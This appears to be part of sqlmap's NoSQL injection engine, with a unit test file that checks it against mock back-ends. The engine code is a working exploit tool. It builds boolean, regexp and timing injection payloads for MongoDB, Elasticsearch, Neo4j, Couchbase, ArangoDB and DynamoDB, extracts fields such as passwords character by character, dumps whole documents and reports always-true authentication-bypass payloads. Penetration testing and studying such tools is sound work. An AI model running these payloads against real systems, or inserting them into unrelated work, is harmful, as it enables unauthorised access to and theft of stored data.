return "[%s]" % _classChar(low) if low == high else "[%s-%s]" % (_classChar(low), _classChar(high))
def _propLiteral(name):
return "'%s'" % name.replace("\\", "\\\\").replace("'", "\\'")
def _enumField(place, parameter, template, payloadFor):
"""Content-based recovery of the string matched by a regexp clause built via payloadFor(regexBody),
reusing the bisection extractor against the always-true single-record `template`"""
return _extract(template, lambda value: _fetchValue(place, parameter, value),
lambda n: payloadFor(".{%d,}" % n),
lambda known, klass: payloadFor(_quoted(_javaEscape(known) + klass)))
def _enumDump(place, parameter, makePayload, keysExpr, valueExpr):
"""Whole-document dump via key enumeration for the regexp dialects: keysExpr(i) -> the i-th field
name, valueExpr(name) -> that field's value. makePayload(targetExpr, regexBody) wraps the dialect
break-out and record binding around a '<targetExpr> matches ^<regexBody>' oracle. Returns
(columns, rows) or None - the caller can then fall back to single-field extraction"""
template = _fetchValue(place, parameter, makePayload(keysExpr(0), ".*")) # the bound single record
if not template or _isError(template):
return None
columns, values = [], []
for index in xrange(NOSQL_MAX_FIELDS):
name = _enumField(place, parameter, template, lambda rb, i=index: makePayload(keysExpr(i), rb))
if not name:
break
columns.append(name)
values.append(_enumField(place, parameter, template, lambda rb, n=name: makePayload(valueExpr(n), rb)) or "")
logger.info("retrieved: %s='%s'" % (name, values[-1]))
return (columns, [values]) if columns else None
def _cypherDump(place, parameter):
"""Blind multi-record collection dump (Neo4j Cypher). Walks every matched node in ascending order
of its internal node id (a unique, ordered, always-present key - unlike property order, which Neo4j
does not guarantee), key-enumerating each node's full document. Returns (columns, rows) or None"""
fetch = lambda payload: _fetchValue(place, parameter, payload)
noMatch = fetch("%s' OR '1'='2" % NOSQL_SENTINEL) # stable zero-record baseline (app closes the quote)
differs = lambda payload: _ratio(fetch(payload), noMatch) < UPPER_RATIO_BOUND
if not noMatch or not differs("%s' OR '1'='1" % NOSQL_SENTINEL):
return None
# a numeric condition opens no string, so balance the app's trailing quote with a tautology
exists = lambda cond: differs("%s' OR %s AND '1'='1" % (NOSQL_SENTINEL, cond))
def minIdGreater(lower):
# smallest internal node id strictly greater than `lower` (None when no further node exists)
if not exists("id(u) > %d" % lower):
return None
hi = lower + 1
while not exists("id(u) > %d AND id(u) <= %d" % (lower, hi)):
hi *= 2
if hi > (1 << 40):
return None
lo = lower
while lo + 1 < hi:
mid = (lo + hi) // 2
if exists("id(u) > %d AND id(u) <= %d" % (lower, mid)):
hi = mid
else:
lo = mid
return hi
columns, records, lastId = [], [], -1
for _ in xrange(NOSQL_MAX_RECORDS):
nodeId = minIdGreater(lastId)
if nodeId is None:
break
record = _enumDump(place, parameter,
lambda expr, rb, k=nodeId: "%s' OR id(u)=%d AND %s =~ '^%s.*" % (NOSQL_SENTINEL, k, expr, rb),
lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n))
if record:
cols, values = record
records.append(dict(zip(cols, values[0]))) # align by field name (keys(u) order is per-node)
columns.extend(_ for _ in cols if _ not in columns)
lastId = nodeId
return (columns, [[row.get(_, "") for _ in columns] for row in records]) if records else None
def _partiqlValue(place, parameter, bind, field):
"""Blind extraction of `field` for the bound record on a DynamoDB PartiQL point. PartiQL has no
regexp, so each character is recovered by an ordered string comparison (field >= 'prefix'+char),
bisected over the printable-ASCII range. Returns the value or None"""
quote = lambda value: value.replace("'", "''") # PartiQL escapes a single quote by doubling it
fetch = lambda payload: _fetchValue(place, parameter, payload)
template = fetch("%s' OR %s%s >= '" % (NOSQL_SENTINEL, bind, field)) # field >= '' -> bound record matches
if not template or _isError(template):
return None
truth = lambda value: _ratio(fetch("%s' OR %s%s >= '%s" % (NOSQL_SENTINEL, bind, field, quote(value))), template) > UPPER_RATIO_BOUND
retVal = ""
while len(retVal) < NOSQL_MAX_LENGTH:
if not truth(retVal + chr(NOSQL_CHAR_MIN)): # no character at this position -> end of value
break
lo, hi = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX
while lo < hi:
mid = (lo + hi + 1) // 2
if truth(retVal + chr(mid)):
lo = mid
else:
hi = mid - 1
retVal += chr(lo)
return retVal or None
def _partiqlDump(place, parameter, key):
"""DynamoDB PartiQL: comparison-extract the injected field, bound to its record by sibling
parameters (PartiQL exposes no key-enumeration, so the dumpable field is the injected one)"""
bind = _constraint(place, parameter, "=", " AND ", prefix="")
if not bind: # need a sibling to pin a single record
return None
value = _partiqlValue(place, parameter, bind, key)
return ([key], [[value]]) if value is not None else None
def _extract(template, fetchFn, lengthValue, charValue, truthFn=None):
"""Blind value recovery: binary-searches the length, then bisects each character's codepoint over
the printable-ASCII range using regexp character-class ranges (sqlmap-style inference, ~log2(range)
requests per character instead of a linear scan - far smaller WAF/log footprint). lengthValue(n)
and charValue(known, charClass) render the dialect payload; the oracle is the content ratio against
`template` by default, or `truthFn(payload)` (e.g. the $where timing predicate)"""
truth = truthFn or (lambda value: _ratio(fetchFn(value), template) > UPPER_RATIO_BOUND)
length, probe = 0, 1
while probe <= NOSQL_MAX_LENGTH and truth(lengthValue(probe)):
length, probe = probe, probe * 2
low, high = length, min(probe, NOSQL_MAX_LENGTH + 1)
while low + 1 < high:
mid = (low + high) // 2
if truth(lengthValue(mid)):
low = mid
else:
high = mid
if not low:
return None
debugMsg = "retrieving the value (%d characters)" % low
logger.debug(debugMsg)
retVal = ""
for _ in xrange(low):
lo, hi = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX
if not truth(charValue(retVal, _klass(lo, hi))):
retVal += '?' # character outside the printable-ASCII range
continue
while lo < hi:
mid = (lo + hi) // 2
if truth(charValue(retVal, _klass(lo, mid))):
hi = mid
else:
lo = mid + 1
retVal += chr(lo)
return retVal
def _resolve(place, parameter, key):
"""Tries each NoSQL dialect in turn; the first that detects fixes the back-end and the extraction
payloads. Returns a Vector (whose `template`/`lengthValue` are None for detection-only back-ends)
or None when nothing matches"""
field = "u.%s" % key
template = _detectMongo(place, parameter)
if template:
return Vector(_fingerprintMongo(place, parameter),
lambda value: _fetch(place, parameter, "$regex", value),
lambda n: "^.{%d,}$" % n,
lambda known, klass: "^%s%s" % (re.escape(known), klass),
template=template, bypass='{"$ne": null}')
template = _detectES(place, parameter)
if template:
return Vector(_fingerprintLucene(place, parameter),
lambda value: _fetchValue(place, parameter, value),
lambda n: "/.{%d,}/" % n,
lambda known, klass: "/%s%s.*/" % (_lucene(known), klass),
template=template, bypass='*')
template = _detectCypher(place, parameter)
if template:
constraint = _constraint(place, parameter)
# Neo4j Cypher, Couchbase N1QL and DynamoDB PartiQL all share the ' OR '1'='1 break-out; tell
# them apart by the regexp/string primitive the back-end honors ('=~', 'REGEXP_CONTAINS', or
# PartiQL 'begins_with')
if not _confirm(place, parameter, "%s' OR %s%s =~ '.*" % (NOSQL_SENTINEL, constraint, field), "%s' OR %s%s =~ '%s" % (NOSQL_SENTINEL, constraint, field, NOSQL_SENTINEL)):
if _confirm(place, parameter, "%s' OR REGEXP_CONTAINS(%s, '.*') OR '1'='2" % (NOSQL_SENTINEL, field), "%s' OR REGEXP_CONTAINS(%s, '%s') OR '1'='2" % (NOSQL_SENTINEL, field, NOSQL_SENTINEL)):
return Vector("Couchbase",
lambda value: _fetchValue(place, parameter, value),
lambda n: "%s' OR REGEXP_CONTAINS(%s, '^.{%d,}') OR '1'='2" % (NOSQL_SENTINEL, field, n),
lambda known, klass: "%s' OR REGEXP_CONTAINS(%s, '^%s') OR '1'='2" % (NOSQL_SENTINEL, field, _quoted(_javaEscape(known) + klass)),
template=template, bypass="' OR '1'='1",
dump=lambda: _enumDump(place, parameter,
lambda expr, rb: "%s' OR REGEXP_CONTAINS(%s, '^%s') OR '1'='2" % (NOSQL_SENTINEL, expr, rb),
lambda i: "OBJECT_NAMES(u)[%d]" % i, lambda n: "TOSTRING(u[%s])" % _propLiteral(n)))
if _confirm(place, parameter, "%s' OR begins_with(%s, '') OR '1'='2" % (NOSQL_SENTINEL, key), "%s' OR begins_with(%s, '%s') OR '1'='2" % (NOSQL_SENTINEL, key, NOSQL_SENTINEL)):
return Vector("DynamoDB", None, None, None, template=template, bypass="' OR '1'='1",
dump=lambda: _partiqlDump(place, parameter, key))
return Vector("Neo4j", None, None, None, template=template, bypass="' OR '1'='1",
dump=lambda: _cypherDump(place, parameter) or _enumDump(place, parameter,
lambda expr, rb: "%s' OR %s%s =~ '^%s.*" % (NOSQL_SENTINEL, constraint, expr, rb),
lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n)))
template = _detectAQL(place, parameter)
if template:
constraint = _constraint(place, parameter, "==", " && ")
# ArangoDB AQL and MongoDB $where (server-side JavaScript) both satisfy the ' || '1'=='1
# break-out; tell them apart by which regexp-match primitive holds - AQL '=~' or a JS /re/.test()
if not _confirm(place, parameter, "%s' || ('x' =~ '.') || '1'=='2" % NOSQL_SENTINEL, "%s' || ('x' =~ 'y') || '1'=='2" % NOSQL_SENTINEL) \
and _confirm(place, parameter, "%s' || /./.test('x') || '1'=='2" % NOSQL_SENTINEL, "%s' || /y/.test('x') || '1'=='2" % NOSQL_SENTINEL):
bound = _constraint(place, parameter, "==", "&&", prefix="this.")
whereTemplate = _fetchValue(place, parameter, "%s' || (%sthis.%s) || '1'=='2" % (NOSQL_SENTINEL, bound, key))
return Vector("MongoDB ($where)",
lambda value: _fetchValue(place, parameter, value),
lambda n: "%s' || (%sthis.%s&&this.%s.length>=%d) || '1'=='2" % (NOSQL_SENTINEL, bound, key, key, n),
lambda known, klass: "%s' || (%sthis.%s&&/^%s%s/.test(this.%s)) || '1'=='2" % (NOSQL_SENTINEL, bound, key, _javaEscape(known), klass, key),
template=whereTemplate, bypass="' || '1'=='1")
return Vector("ArangoDB",
lambda value: _fetchValue(place, parameter, value),
lambda n: "%s' || (%s%s =~ '^.{%d,}') || '1'=='2" % (NOSQL_SENTINEL, constraint, field, n),
lambda known, klass: "%s' || (%s%s =~ '^%s') || '1'=='2" % (NOSQL_SENTINEL, constraint, field, _quoted(_javaEscape(known) + klass)),
template=template, bypass="' || '1'=='1",
dump=lambda: _enumDump(place, parameter,
lambda expr, rb: "%s' || (%s%s =~ '^%s') || '1'=='2" % (NOSQL_SENTINEL, constraint, expr, rb),
lambda i: "ATTRIBUTES(u)[%d]" % i, lambda n: "TO_STRING(u[%s])" % _propLiteral(n)))
numeric = _detectNumeric(place, parameter)
if numeric:
dbms, template, bypass = numeric
dump = None
if dbms == "Neo4j": # bind the dump to the injected numeric field (e.g. u.id = 1)
value = (_originalValue(place, parameter) or "1").strip()
dump = lambda: _enumDump(place, parameter,
lambda expr, rb: "%s AND (%s =~ '^%s.*')" % (value, expr, rb),
lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n))
return Vector(dbms, None, None, None, template=template, bypass=bypass, dump=dump)
threshold = _detectWhere(place, parameter)
if threshold is not None:
bound = _constraint(place, parameter, "==", "&&", prefix="d.")
return Vector("MongoDB ($where)", None, None, None,
dump=lambda: _whereDump(place, parameter, bound, threshold))
engine = _detectError(place, parameter)
if engine:
return Vector(engine, None, None, None)
return None
def _inband(place, parameter, template):
"""In-band data exposure gate: returns the always-true response when it carries materially more
(reflected) content than the original request - i.e. the injection is returning extra records
directly - else None"""
original = _fetchValue(place, parameter, _originalValue(place, parameter) or "1")
if template and len(template) > len(original) and _ratio(template, original) < UPPER_RATIO_BOUND and not re.search(NOSQL_ERROR_REGEX, template):
return template
return None
def _clean(cell):
cell = re.sub(r"(?s)<[^>]+>", "", cell)
for entity, char in (("&amp;", '&'), ("&lt;", '<'), ("&gt;", '>'), ("&quot;", '"'), ("&#39;", "'"), ("&apos;", "'")):
cell = cell.replace(entity, char)
return re.sub(r"\s+", " ", cell).strip()
def _records(page):
"""Parses structured records out of a reflected response - a JSON array of objects or an HTML
table - returning (columns, rows) for a tabular dump, else None"""
try:
data = json.loads(page, object_pairs_hook=OrderedDict)
rows = data if isinstance(data, list) else next((_ for _ in data.values() if isinstance(_, list)), None) if isinstance(data, dict) else None
rows = [_ for _ in (rows or []) if isinstance(_, dict)]
if rows:
columns = []
for row in rows:
columns.extend(_ for _ in row if _ not in columns)
return columns, [[("NULL" if row[_] is None else _clean("%s" % row[_])) if _ in row else "" for _ in columns] for row in rows]
except (ValueError, TypeError):
pass
for body in re.findall(r"(?is)<table[^>]*>(.*?)</table>", page or ""):
header, rows = None, []
for index, tr in enumerate(re.findall(r"(?is)<tr[^>]*>(.*?)</tr>", body)):
cells = re.findall(r"(?is)<t[dh][^>]*>(.*?)</t[dh]>", tr)
if index == 0 and re.search(r"(?i)<th[\s>]", tr):
header = [_clean(_) for _ in cells]
elif cells:
rows.append([_clean(_) for _ in cells])
if rows:
width = max(len(_) for _ in rows)
columns = header if header and len(header) == width else ["column_%d" % (_ + 1) for _ in xrange(width)]
return columns, [row + [""] * (width - len(row)) for row in rows]
return None
def _grid(columns, rows):
"""Renders (columns, rows) as a sqlmap-style ASCII table"""
widths = [max([len(columns[index])] + [len(row[index]) for row in rows if index < len(row)]) for index in xrange(len(columns))]
separator = '+' + '+'.join('-' * (width + 2) for width in widths) + '+'
line = lambda cells: "| " + " | ".join((cells[index] if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |"
return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator])
def _dumpInband(place, key, page):
"""Renders in-band records as a regular sqlmap-style table, or falls back to cleaned text"""
parsed = _records(page)
if parsed:
columns, rows = parsed
conf.dumper.singleString("NoSQL: %s parameter '%s' in-band records [%d]:\n%s" % (place, key, len(rows), _grid(columns, rows)))
else:
text = re.sub(r"\s+", " ", re.sub(r"(?s)<[^>]+>", " ", page)).strip()
conf.dumper.singleString("NoSQL: %s parameter '%s' in-band data: %s" % (place, key, text[:NOSQL_DUMP_LIMIT]))
def nosqlScan():
"""Entry point for '--nosql': detects NoSQL injection (MongoDB/CouchDB operator, Lucene
query_string, Cypher/N1QL/AQL string break-out, MongoDB $where time-based, or error-based). On a
confirmed point it tries, in order, to (1) dump records exposed in-band by the always-true payload
and (2) blindly recover the targeted field via the regexp/timing oracle"""
global NOSQL_SENTINEL
NOSQL_SENTINEL = randomStr(length=10, lowercase=True)
# NoSQL injection from an application-scoped point is confined to the back-end's single query
# (one collection/label) - it confirms and dumps what that query can reach, with no analog to the
# SQL database/table/user/banner enumeration, so those switches do not apply here
infoMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
infoMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
infoMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
logger.info(infoMsg)
tested = found = 0
for place in (_ for _ in NOSQL_PLACES if _ in conf.paramDict):
for parameter in list(conf.paramDict[place].keys()):
key = _jsonKey(parameter)
if conf.testParameter and not any(_ in conf.testParameter for _ in (key, parameter)):
continue
tested += 1
infoMsg = "testing NoSQL injection on %s parameter '%s'" % (place, key)
logger.info(infoMsg)
vector = _resolve(place, parameter, key)
if not vector:
continue
found += 1
infoMsg = "%s parameter '%s' is vulnerable to NoSQL injection (back-end: '%s')" % (place, key, vector.dbms)
logger.info(infoMsg)
# standard sqlmap-style injection-point summary (reproducible vector)
if vector.bypass == '{"$ne": null}':
title, payload = "operator injection", "%s[$ne]=%s" % (key, NOSQL_SENTINEL)
elif vector.bypass == '*':
title, payload = "Lucene query_string injection", "%s=*" % key
elif vector.bypass:
context = "numeric" if vector.bypass[:1].isdigit() else "string"
title, payload = "boolean-based blind (%s)" % context, "%s=%s" % (key, vector.bypass)
elif vector.dump is not None:
title, payload = "time-based blind (server-side JavaScript $where)", "%s=' || (sleep loop) || '" % key
else:
title, payload = "error-based", "%s=%s'" % (key, _originalValue(place, parameter) or "1")
report = "---\nParameter: %s (%s)\n Type: NoSQL injection\n Title: %s %s\n Payload: %s\n---" % (key, place, vector.dbms, title, payload)
conf.dumper.singleString(report)
if vector.bypass:
infoMsg = "%s parameter '%s' can be coerced always-true with '%s' (e.g. authentication/filter bypass)" % (place, key, vector.bypass)
logger.info(infoMsg)
dumped = False
# a named whole-document dump is preferred over the unnamed in-band table
if vector.dump is not None:
infoMsg = "retrieving the reachable document(s)"
logger.info(infoMsg)
records = vector.dump()
if records:
columns, rows = records
infoMsg = "dumped %d record%s (%d field%s)" % (len(rows), 's' if len(rows) != 1 else '', len(columns), 's' if len(columns) != 1 else '')
logger.info(infoMsg)
conf.dumper.singleString("NoSQL: %s parameter '%s' %s:\n%s" % (place, key, "documents" if len(rows) != 1 else "document", _grid(columns, rows)))
dumped = True
if not dumped and vector.template is not None:
exposure = _inband(place, parameter, vector.template)
if exposure:
infoMsg = "the always-true payload returns additional records (in-band data exposure)"
logger.info(infoMsg)
_dumpInband(place, key, exposure)
dumped = True
if vector.lengthValue is not None:
value = _extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth)
if value is not None:
conf.dumper.singleString("NoSQL: %s parameter '%s' -> %s" % (place, key, repr(value)))
dumped = True
if not dumped:
if vector.template is None and vector.truth is None and vector.dump is None:
warnMsg = "injection is detection-only for back-end '%s' (no extraction oracle for this engine)" % vector.dbms
else:
warnMsg = "injection on '%s' is confirmed but yielded no data here: this point exposes only a boolean oracle on a non-extractable (e.g. numeric) field. Target a string-compared parameter (e.g. a login/search field) to blindly read a value" % key
logger.warning(warnMsg)
if not found:
warnMsg = "no parameter appears to be injectable via NoSQL injection (%d tested)" % tested
logger.warning(warnMsg)

650
tests/test_nosql.py Normal file
View file

@ -0,0 +1,650 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
Offline, deterministic tests for the NoSQL injection engine. Mock oracles stand in for the
HTTP/back-end layer so detection and blind extraction can be exercised without a live target,
covering each dialect: MongoDB/CouchDB operator injection, Elasticsearch/Solr query_string,
Neo4j Cypher and ArangoDB AQL string break-out.
"""
import re
import unittest
from _testutils import bootstrap
bootstrap()
import lib.techniques.nosql.inject as ni
SECRET = "S3cr3t_9"
MATCH = "<html><body>Welcome user; rows: alpha, bravo, charlie</body></html>"
NOMATCH = "<html><body>Invalid credentials; no rows</body></html>"
def _mongo(place, parameter, op, value, isArray=False):
if op == "$ne":
return MATCH
if op == "$in":
return NOMATCH
if op == "$regex":
try:
return MATCH if re.match(value, SECRET) is not None else NOMATCH
except re.error:
return "<html><body>error: invalid regular expression</body></html>"
return ""
def _es(place, parameter, value):
if value == "*":
return MATCH
if value == ni.NOSQL_SENTINEL:
return NOMATCH
if value.startswith("/") and value.endswith("/"): # Lucene regexp is full-anchored
try:
return MATCH if re.match("^(?:%s)$" % value[1:-1], SECRET) is not None else NOMATCH
except re.error:
return "<html><body>error: parse_exception</body></html>"
return NOMATCH
class TestNoSqlMongo(unittest.TestCase):
def setUp(self):
self._orig = ni._fetch
ni._fetch = _mongo
def tearDown(self):
ni._fetch = self._orig
def test_detect(self):
self.assertTrue(ni._detectMongo("GET", "password"))
def test_extract(self):
template = ni._fetch("GET", "password", "$ne", ni.NOSQL_SENTINEL)
value = ni._extract(template,
lambda v: ni._fetch("GET", "password", "$regex", v),
lambda n: "^.{%d,}$" % n,
lambda known, klass: "^" + re.escape(known) + klass)
self.assertEqual(value, SECRET)
def test_not_injectable(self):
ni._fetch = lambda *args, **kwargs: MATCH
self.assertIsNone(ni._detectMongo("GET", "password"))
class TestNoSqlElasticsearch(unittest.TestCase):
def setUp(self):
self._orig = ni._fetchValue
ni._fetchValue = _es
def tearDown(self):
ni._fetchValue = self._orig
def test_detect(self):
self.assertTrue(ni._detectES("GET", "q"))
def test_extract(self):
template = ni._fetchValue("GET", "q", "*")
value = ni._extract(template,
lambda v: ni._fetchValue("GET", "q", v),
lambda n: "/.{%d,}/" % n,
lambda known, klass: "/%s%s.*/" % (ni._lucene(known), klass))
self.assertEqual(value, SECRET)
def test_not_injectable(self):
ni._fetchValue = lambda *args, **kwargs: MATCH
self.assertIsNone(ni._detectES("GET", "q"))
def _cypher(place, parameter, value):
if "'1'='1" in value:
return MATCH
if "'1'='2" in value:
return NOMATCH
m = re.search(r"=~ '\^(.*)$", value) # the regex body after the =~ operator
if m:
try:
return MATCH if re.match("^(?:%s)$" % m.group(1), SECRET) is not None else NOMATCH
except re.error:
return NOMATCH
return NOMATCH
class TestNoSqlCypher(unittest.TestCase):
def setUp(self):
self._orig = ni._fetchValue
ni._fetchValue = _cypher
def tearDown(self):
ni._fetchValue = self._orig
def test_detect(self):
self.assertTrue(ni._detectCypher("GET", "password"))
def test_extract(self):
template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' OR '1'='1")
value = ni._extract(template,
lambda v: ni._fetchValue("GET", "password", v),
lambda n: "%s' OR u.password =~ '^.{%d,}" % (ni.NOSQL_SENTINEL, n),
lambda known, klass: "%s' OR u.password =~ '^%s%s.*" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass))
self.assertEqual(value, SECRET)
def _aql(place, parameter, value):
m = re.search(r"=~ '(\^[^']*)'", value) # the regex body inside =~ '...'
if m:
try: # ArangoDB =~ is a partial (unanchored) match
return MATCH if re.search(m.group(1), SECRET) is not None else NOMATCH
except re.error:
return NOMATCH
if "'1'=='1" in value:
return MATCH
return NOMATCH
class TestNoSqlArango(unittest.TestCase):
def setUp(self):
self._orig = ni._fetchValue
ni._fetchValue = _aql
def tearDown(self):
ni._fetchValue = self._orig
def test_detect(self):
self.assertTrue(ni._detectAQL("GET", "password"))
def test_extract(self):
template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' || '1'=='1")
value = ni._extract(template,
lambda v: ni._fetchValue("GET", "password", v),
lambda n: "%s' || (u.password =~ '^.{%d,}') || '1'=='2" % (ni.NOSQL_SENTINEL, n),
lambda known, klass: "%s' || (u.password =~ '^%s%s') || '1'=='2" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass))
self.assertEqual(value, SECRET)
def _n1ql(place, parameter, value):
m = re.search(r"REGEXP_CONTAINS\([^,]+, '([^']*)'\)", value)
if m:
try: # model the single-quoted string layer (collapse the doubled backslashes)
return MATCH if re.search(m.group(1).replace("\\\\", "\\"), SECRET) is not None else NOMATCH
except re.error:
return NOMATCH
if "=~" in value: # N1QL has no =~ operator -> engine error
return "error: syntax error near '=~'"
if "'1'='1" in value:
return MATCH
return NOMATCH
class TestNoSqlN1QL(unittest.TestCase):
"""Couchbase N1QL shares the ' OR '1'='1 break-out with Neo4j; _resolve() must disambiguate by the
regexp-match primitive (=~ fails, REGEXP_CONTAINS works) and still extract"""
def setUp(self):
self._f, self._fv = ni._fetch, ni._fetchValue
ni._fetch = lambda *args, **kwargs: "" # keep MongoDB operator detection out of the way
ni._fetchValue = _n1ql
ni.conf.parameters = {"GET": "name=luther&password=x"}
def tearDown(self):
ni._fetch, ni._fetchValue = self._f, self._fv
def test_resolve_disambiguates_couchbase(self):
vector = ni._resolve("GET", "password", "password")
self.assertEqual(vector.dbms, "Couchbase")
self.assertEqual(vector.bypass, "' OR '1'='1")
def test_extract(self):
vector = ni._resolve("GET", "password", "password")
self.assertEqual(ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth), SECRET)
def _whereTruth(payload):
# emulate the $where timing oracle: a payload "delays" (=> True) iff its embedded JS condition holds
m = re.search(r"length>=(\d+)", payload)
if m:
return len(SECRET) >= int(m.group(1))
m = re.search(r"/\^([^/]*)/\.test", payload)
if m:
return re.search("^" + m.group(1), SECRET) is not None
return False
class TestNoSqlWhere(unittest.TestCase):
"""MongoDB $where time-based: validates the server-side-JS payload shapes and the time-based
extraction loop (timing predicate emulated deterministically)"""
def setUp(self):
ni.conf.timeSec = 5
def test_extract(self):
key = "password"
lengthValue = lambda n: ni._whereDelay("d.%s&&d.%s.length>=%d" % (key, key, n))
charValue = lambda known, klass: ni._whereDelay("d.%s&&/^%s%s/.test(d.%s)" % (key, ni._javaEscape(known), klass, key))
self.assertEqual(ni._extract(None, None, lengthValue, charValue, _whereTruth), SECRET)
def _jswhere(place, parameter, value):
# emulate a content-bearing MongoDB $where (server-side JavaScript) endpoint
if " OR " in value or " =~ " in value: # not valid JS -> consistent (non-diverging) error
return "<error>"
m = re.search(r"/(.)/\.test\('x'\)", value) # JS regexp-test disambiguation probe
if m:
return MATCH if re.search(m.group(1), "x") is not None else NOMATCH
m = re.search(r"/\^([^/]*)/\.test\(this\.password\)", value) # value extraction
if m:
try:
return MATCH if re.search("^" + m.group(1), SECRET) is not None else NOMATCH
except re.error:
return NOMATCH
m = re.search(r"length>=(\d+)", value) # length search
if m:
return MATCH if len(SECRET) >= int(m.group(1)) else NOMATCH
if "'1'=='1" in value or "this.password)" in value: # boolean detection / bound always-true template
return MATCH
return NOMATCH
class TestNoSqlWhereContent(unittest.TestCase):
"""Content-bearing MongoDB $where shares the ' || '1'=='1 break-out with ArangoDB; _resolve() must
disambiguate (AQL '=~' fails, a JS /re/.test() holds) and extract via the content oracle"""
def setUp(self):
self._f, self._fv = ni._fetch, ni._fetchValue
ni._fetch = lambda *args, **kwargs: ""
ni._fetchValue = _jswhere
ni.conf.parameters = {"GET": "username=luther&password=x"}
def tearDown(self):
ni._fetch, ni._fetchValue = self._f, self._fv
def test_resolve_where_content(self):
vector = ni._resolve("GET", "password", "password")
self.assertEqual(vector.dbms, "MongoDB ($where)")
self.assertEqual(vector.bypass, "' || '1'=='1")
def test_extract(self):
vector = ni._resolve("GET", "password", "password")
self.assertEqual(ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth), SECRET)
class TestNoSqlWhereDump(unittest.TestCase):
"""$where whole-document dump: Object.keys(this) enumeration drives name + value recovery for every
field (per-field char recovery itself is covered by TestNoSqlWhere)"""
DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]
def setUp(self):
self._orig = ni._whereField
names = [name for name, _ in self.DOC]
values = dict(self.DOC)
def fake(place, parameter, bound, expr, threshold):
m = re.search(r"Object\.keys\(d\)\[(\d+)\]", expr)
if m:
index = int(m.group(1))
return names[index] if index < len(names) else None
m = re.search(r"d\['([^']*)'\]", expr)
if m:
return values.get(m.group(1))
return None
ni._whereField = fake
def tearDown(self):
ni._whereField = self._orig
def test_dump(self):
columns, rows = ni._whereDump("GET", "password", "", 0)
self.assertEqual(columns, ["id", "username", "password", "role"])
self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])
def test_empty_document(self):
ni._whereField = lambda *args, **kwargs: None
self.assertIsNone(ni._whereDump("GET", "password", "", 0))
class TestNoSqlEnumDump(unittest.TestCase):
"""Content-based whole-document dump (e.g. Neo4j keys(u)): enumerate field names then values"""
DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]
def setUp(self):
self._ef, self._fv = ni._enumField, ni._fetchValue
ni._fetchValue = lambda *args, **kwargs: "<b>Welcome</b>" # non-error single-record template
names = [name for name, _ in self.DOC]
values = dict(self.DOC)
def fake(place, parameter, template, payloadFor):
probe = payloadFor("X") # render to inspect the target expression
m = re.search(r"\(u\)\[(\d+)\]", probe) # keys/ATTRIBUTES/OBJECT_NAMES(u)[i]
if m:
index = int(m.group(1))
return names[index] if index < len(names) else None
m = re.search(r"u\['([^']*)'\]", probe) # toString/TO_STRING/TOSTRING(u['name'])
if m:
return values.get(m.group(1))
return None
ni._enumField = fake
def tearDown(self):
ni._enumField, ni._fetchValue = self._ef, self._fv
def _check(self, keysExpr, valueExpr):
makePayload = lambda expr, rb: "X' OR %s =~ '^%s.*" % (expr, rb)
columns, rows = ni._enumDump("GET", "password", makePayload, keysExpr, valueExpr)
self.assertEqual(columns, ["id", "username", "password", "role"])
self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])
def test_cypher(self):
self._check(lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % ni._propLiteral(n))
def test_aql(self):
self._check(lambda i: "ATTRIBUTES(u)[%d]" % i, lambda n: "TO_STRING(u[%s])" % ni._propLiteral(n))
def test_n1ql(self):
self._check(lambda i: "OBJECT_NAMES(u)[%d]" % i, lambda n: "TOSTRING(u[%s])" % ni._propLiteral(n))
class TestNoSqlBypass(unittest.TestCase):
"""Confirmed injection must surface the always-true (authentication/filter bypass) payload"""
def setUp(self):
self._f = ni._fetch
ni._fetch = _mongo
def tearDown(self):
ni._fetch = self._f
def test_mongo_bypass(self):
vector = ni._resolve("GET", "password", "password")
self.assertEqual(vector.dbms, "MongoDB")
self.assertEqual(vector.bypass, '{"$ne": null}')
class TestNoSqlInband(unittest.TestCase):
"""In-band exposure gate: _inband() returns the always-true response only when it carries
materially more reflected content than the original request"""
def setUp(self):
self._fv = ni._fetchValue
ni.conf.parameters = {"GET": "id=1"}
def tearDown(self):
ni._fetchValue = self._fv
def test_exposure_detected(self):
ni._fetchValue = lambda place, parameter, value: "<table><tr><td>1</td><td>luther</td></tr></table>" # original (one row)
template = "<table><tr><td>1</td><td>luther</td></tr><tr><td>2</td><td>fluffy</td></tr><tr><td>3</td><td>wu</td></tr></table>"
self.assertEqual(ni._inband("GET", "id", template), template)
def test_no_exposure_when_not_larger(self):
ni._fetchValue = lambda place, parameter, value: "X" * 200 # original (large)
self.assertIsNone(ni._inband("GET", "id", "<b>Welcome</b>")) # always-true smaller -> no dump
class TestNoSqlRecords(unittest.TestCase):
"""Reflected responses are parsed into (columns, rows) for a regular table dump"""
def test_html_table_without_header(self):
page = ("<html><body><b>Results:</b><table border=\"1\">"
"<tr><td>1</td><td>luther</td><td>blisset</td></tr>"
"<tr><td>2</td><td>fluffy</td><td>bunny</td></tr></table></body></html>")
columns, rows = ni._records(page)
self.assertEqual(columns, ["column_1", "column_2", "column_3"])
